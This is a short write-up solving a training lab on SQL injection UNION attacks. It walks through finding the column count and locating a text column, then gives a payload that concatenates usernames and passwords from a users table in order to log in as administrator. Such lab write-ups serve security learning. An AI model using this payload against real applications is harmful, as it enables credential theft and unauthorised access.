1.6 Lab: SQL injection UNION attack, retrieving multiple values in a single column | 2023
This lab contains a SQL injection vulnerability in the product category filter. The results from the query are returned in the application’s response so you can use a UNION attack to retrieve data from other tables. The database contains a different table called users, with columns called username and password | Karthikeyan Nagaraj
Description
This lab contains a SQL injection vulnerability in the product category filter. The results from the query are returned in the application’s response so you can use a UNION attack to retrieve data from other tables.
The database contains a different table called users
, with columns called username
and password
.
To solve the lab, perform a SQL injection UNION attack that retrieves all usernames and passwords, and use the information to log in as the administrator
user.
Solution
- Use the technique which we used in the previous lab to find the number of Columns
- We found that there are 2 Columns, so we have to put a random string on each column separately.
- Replace any String in the Place of
NULL
in the 1st column, if it throws an error, put that string on the next place of NULL. - Now we know that the second column contains the data
- So, Paste the below query to retrieve all data from that particular column
'+UNION+SELECT+NULL,username||'~'||password+FROM+users--
If you would like to support me so that I can create more free content — https://www.buymeacoffee.com/cyberw1ng
Thank you for Reading!
Happy Hacking ~
Author: Karthikeyan Nagaraj ~ Cyberw1ng
Telegram Channel for Ethical Hacking Dumps — https://t.me/ethicalhackingessentials